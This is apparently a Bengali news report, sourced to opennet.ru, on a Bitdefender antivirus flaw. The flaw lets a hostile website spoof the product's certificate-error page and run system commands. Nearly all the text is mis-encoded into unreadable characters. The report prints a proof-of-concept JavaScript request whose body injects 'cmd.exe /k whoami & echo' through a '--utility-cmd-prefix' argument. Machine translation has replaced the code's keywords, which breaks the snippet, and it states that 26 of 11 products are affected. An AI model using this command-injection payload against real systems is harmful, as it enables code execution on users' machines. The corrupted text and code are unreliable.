āĻā§āĻ˛āĻžāĻĻāĻŋāĻŽāĻŋāĻ° āĻĒā§āĻ¯āĻžāĻ˛āĻžāĻ¨ā§āĻ, āĻ
ā§āĻ¯āĻžāĻĄāĻŦā§āĻ˛āĻ āĻĒā§āĻ˛āĻžāĻ¸ā§āĻ° āĻ¸ā§āĻ°āĻˇā§āĻāĻž,
āĻ¸āĻŽāĻ¸ā§āĻ¯āĻžāĻ° āĻāĻžāĻ°āĻŖ āĻšāĻ˛ Bitdefender āĻ ā§āĻ¯āĻžāĻ¨ā§āĻāĻŋāĻāĻžāĻāĻ°āĻžāĻ¸ āĻ¸āĻžāĻāĻā§āĻ° āĻāĻ¸āĻ˛ TLS āĻ¸āĻžāĻ°ā§āĻāĻŋāĻĢāĻŋāĻā§āĻ āĻĒā§āĻ°āĻ¤āĻŋāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°ā§ HTTPS āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻā§āĻ° āĻ¸ā§āĻĨāĻžāĻ¨ā§āĻ¯āĻŧ āĻŦāĻžāĻ§āĻž āĻĻā§āĻ¯āĻŧāĨ¤ āĻā§āĻ˛āĻžāĻ¯āĻŧā§āĻ¨ā§āĻā§āĻ° āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽā§ āĻāĻāĻāĻŋ āĻ āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻ°ā§āĻ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ° āĻāĻ¨āĻ¸ā§āĻāĻ˛ āĻāĻ°āĻž āĻšāĻ¯āĻŧā§āĻā§, āĻ¯āĻž āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻ āĻĒāĻ°āĻŋāĻĻāĻ°ā§āĻļāĻ¨ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽā§āĻ° āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻ˛āĻžāĻĒāĻāĻŋ āĻāĻĄāĻŧāĻžāĻ˛ āĻāĻ°āĻž āĻ¸āĻŽā§āĻāĻŦ āĻāĻ°ā§ āĻ¤ā§āĻ˛ā§āĨ¤ āĻ ā§āĻ¯āĻžāĻ¨ā§āĻāĻŋāĻāĻžāĻāĻ°āĻžāĻ¸ āĻ¨āĻŋāĻā§āĻā§ āĻ¸ā§āĻ°āĻā§āĻˇāĻŋāĻ¤ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¯ā§āĻā§āĻ¤ āĻāĻ°ā§ āĻāĻŦāĻ āĻ¨āĻŋāĻ°āĻžāĻĒāĻĻ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻĢāĻžāĻāĻļāĻ¨ āĻŦāĻžāĻ¸ā§āĻ¤āĻŦāĻžāĻ¯āĻŧāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻāĻŋāĻā§ āĻĒā§āĻˇā§āĻ āĻžāĻ¯āĻŧ āĻ¤āĻžāĻ° āĻ¨āĻŋāĻāĻ¸ā§āĻŦ āĻāĻžāĻāĻžāĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻā§āĻĄ āĻ¸āĻ¨ā§āĻ¨āĻŋāĻŦā§āĻļ āĻāĻ°āĻžāĻ¯āĻŧ, āĻāĻŦāĻ āĻ¨āĻŋāĻ°āĻžāĻĒāĻĻ āĻ¸āĻāĻ¯ā§āĻ āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°ā§ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž āĻšāĻ˛ā§, āĻāĻāĻŋ āĻĢāĻŋāĻ°ā§ āĻāĻ¸āĻž āĻ¤ā§āĻ°ā§āĻāĻŋāĻ° āĻĒā§āĻˇā§āĻ āĻžāĻāĻŋāĻā§ āĻ¨āĻŋāĻā§āĻ° āĻ¸āĻžāĻĨā§ āĻĒā§āĻ°āĻ¤āĻŋāĻ¸ā§āĻĨāĻžāĻĒāĻ¨ āĻāĻ°ā§ā§ˇ āĻ¯ā§āĻšā§āĻ¤ā§ āĻ¨āĻ¤ā§āĻ¨ āĻ¤ā§āĻ°ā§āĻāĻŋ āĻĒā§āĻˇā§āĻ āĻžāĻāĻŋ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻā§āĻ˛āĻžāĻ° āĻĒāĻā§āĻˇ āĻĨā§āĻā§ āĻĒāĻ°āĻŋāĻŦā§āĻļāĻŋāĻ¤ āĻšāĻ¯āĻŧā§āĻā§, āĻ¸ā§āĻ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§āĻ° āĻ āĻ¨ā§āĻ¯āĻžāĻ¨ā§āĻ¯ āĻĒā§āĻˇā§āĻ āĻžāĻā§āĻ˛āĻŋāĻ¤ā§ āĻŦāĻŋāĻāĻĄāĻŋāĻĢā§āĻ¨ā§āĻĄāĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸āĻ¨ā§āĻ¨āĻŋāĻŦā§āĻļāĻŋāĻ¤ āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§āĻ¤ā§ āĻ¸āĻŽā§āĻĒā§āĻ°ā§āĻŖ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻ°āĻ¯āĻŧā§āĻā§ā§ˇ
āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¨āĻŋāĻ¯āĻŧāĻ¨ā§āĻ¤ā§āĻ°āĻŋāĻ¤ āĻāĻāĻāĻŋ āĻ¸āĻžāĻāĻ āĻā§āĻ˛āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ, āĻ¸ā§āĻ āĻ¸āĻžāĻāĻāĻāĻŋ āĻāĻāĻāĻŋ XMLHttpRequest āĻĒāĻžāĻ āĻžāĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻāĻŦāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻā§āĻ°āĻŋāĻ¯āĻŧāĻž āĻāĻžāĻ¨āĻžāĻ¨ā§āĻ° āĻ¸āĻŽāĻ¯āĻŧ HTTPS āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°ā§āĻ° āĻ¸āĻžāĻĨā§ āĻ¸āĻŽāĻ¸ā§āĻ¯āĻž āĻĻā§āĻāĻžāĻ¤ā§ āĻĒāĻžāĻ°ā§, āĻ¯āĻž āĻŦāĻŋāĻāĻĄāĻŋāĻĢā§āĻ¨ā§āĻĄāĻžāĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸ā§āĻĒā§āĻĢ āĻāĻ°āĻž āĻāĻāĻāĻŋ āĻ¤ā§āĻ°ā§āĻāĻŋāĻ° āĻĒā§āĻˇā§āĻ āĻž āĻĢā§āĻ°āĻ¤ āĻĻā§āĻ¯āĻŧāĨ¤ āĻ¯ā§āĻšā§āĻ¤ā§ āĻ¤ā§āĻ°ā§āĻāĻŋāĻ° āĻĒā§āĻˇā§āĻ āĻžāĻāĻŋ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ° āĻĄā§āĻŽā§āĻ¨ā§āĻ° āĻĒā§āĻ°ā§āĻā§āĻˇāĻžāĻĒāĻā§ āĻā§āĻ˛āĻž āĻšāĻ¯āĻŧā§āĻā§, āĻ¸ā§ āĻŦāĻŋāĻāĻĄāĻŋāĻĢā§āĻ¨ā§āĻĄāĻžāĻ° āĻĒā§āĻ¯āĻžāĻ°āĻžāĻŽāĻŋāĻāĻžāĻ° āĻ¸āĻš āĻ¸ā§āĻĒā§āĻĢ āĻāĻ°āĻž āĻĒā§āĻˇā§āĻ āĻžāĻ° āĻŦāĻŋāĻˇāĻ¯āĻŧāĻŦāĻ¸ā§āĻ¤ā§ āĻĒāĻĄāĻŧāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ Bitdefender āĻĻā§āĻŦāĻžāĻ°āĻž āĻĒā§āĻ°āĻĻāĻ¤ā§āĻ¤ āĻĒā§āĻˇā§āĻ āĻžāĻāĻŋāĻ¤ā§ āĻāĻāĻāĻŋ āĻ¸ā§āĻļāĻ¨ āĻā§ āĻ°āĻ¯āĻŧā§āĻā§ āĻ¯āĻž āĻāĻĒāĻ¨āĻžāĻā§ āĻāĻāĻāĻŋ āĻĒā§āĻĨāĻ Safepay āĻŦā§āĻ°āĻžāĻāĻāĻžāĻ° āĻ¸ā§āĻļāĻ¨ āĻāĻžāĻ˛ā§ āĻāĻ°āĻ¤ā§, āĻ¨āĻŋāĻ°ā§āĻŦāĻŋāĻāĻžāĻ°ā§ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ˛āĻžāĻāĻ¨ āĻĢā§āĻ˛ā§āĻ¯āĻžāĻāĻā§āĻ˛āĻŋ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻ°ā§ āĻāĻŦāĻ "--utility-cmd-prefix" āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ¯ā§āĻā§āĻ¨ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ˛ā§ āĻāĻ°āĻ¤ā§ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ Bitdefender API āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĻā§āĻ¯āĻŧāĨ¤ āĻĒāĻ¤āĻžāĻāĻž āĻāĻāĻāĻŋ āĻļā§āĻˇāĻŖā§āĻ° āĻāĻāĻāĻŋ āĻāĻĻāĻžāĻšāĻ°āĻŖ (param1 āĻāĻŦāĻ param2 āĻšāĻ˛ āĻ¤ā§āĻ°ā§āĻāĻŋ āĻĒā§āĻˇā§āĻ āĻž āĻĨā§āĻā§ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻŽāĻžāĻ¨):
var āĻ
āĻ¨ā§āĻ°ā§āĻ§ = āĻ¨āĻ¤ā§āĻ¨ XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader(ÂĢBDNDSS_B67EA559F21B487F861FDA8A44F01C50Âģ, param1);
request.setRequestHeader(ÂĢBDNDCA_BBACF84D61A04F9AA66019A14B035478Âģ, param2);
request.setRequestHeader(ÂĢBDNDWB_5056E556833D49C1AF4085CB254FC242Âģ, ÂĢobk.runÂģ);
request.setRequestHeader(ÂĢBDNDOK_4E961A95B7B44CBCA1907D3D3643370DÂģ, location.href);
request.send("data:text/html,nada âutility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
āĻāĻŽāĻžāĻĻā§āĻ° āĻ¸ā§āĻŽāĻ°āĻŖ āĻāĻ°āĻž āĻ¯āĻžāĻ 2017 āĻ¸āĻžāĻ˛ā§ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻŋāĻ¤ āĻāĻāĻāĻŋ āĻ¸āĻŽā§āĻā§āĻˇāĻž
11āĻāĻŋ āĻĒāĻŖā§āĻ¯ā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° 26āĻāĻŋāĻ āĻŦāĻ°ā§āĻ¤āĻŽāĻžāĻ¨ āĻ¸āĻžāĻāĻĢāĻžāĻ° āĻ¸ā§āĻ¯ā§āĻ āĻĒā§āĻ°āĻĻāĻžāĻ¨ āĻāĻ°ā§āĨ¤ 5āĻāĻŋ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻĢāĻŋāĻā§āĻ āĻ¯āĻžāĻāĻžāĻ āĻāĻ°ā§āĻ¨āĻŋ (āĻā§āĻ¯āĻžāĻ¸āĻĒāĻžāĻ°āĻ¸ā§āĻāĻŋ āĻāĻ¨ā§āĻāĻžāĻ°āĻ¨ā§āĻ āĻ¸āĻŋāĻāĻŋāĻāĻ°āĻŋāĻāĻŋ 16 āĻŽā§āĻ¯āĻžāĻ, NOD32 AV 9, āĻ¸āĻžāĻāĻŦāĻžāĻ°āĻ¸āĻŋāĻāĻžāĻ°, āĻ¨ā§āĻ āĻ¨ā§āĻ¯āĻžāĻ¨āĻŋ 7 āĻāĻāĻ¨, āĻ¨ā§āĻ āĻ¨ā§āĻ¯āĻžāĻ¨āĻŋ 7 āĻŽā§āĻ¯āĻžāĻ)āĨ¤ āĻā§āĻ¯āĻžāĻ¸āĻĒāĻžāĻ°āĻ¸ā§āĻāĻŋ āĻāĻ¨ā§āĻāĻžāĻ°āĻ¨ā§āĻ āĻ¸āĻŋāĻāĻŋāĻāĻ°āĻŋāĻāĻŋ āĻāĻŦāĻ āĻā§āĻāĻžāĻ˛ āĻ¸āĻŋāĻāĻŋāĻāĻ°āĻŋāĻāĻŋ āĻĒāĻŖā§āĻ¯ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻļāĻŋāĻāĻžāĻ° āĻšāĻ¯āĻŧā§āĻā§
āĻāĻ¤ā§āĻ¸: opennet.ru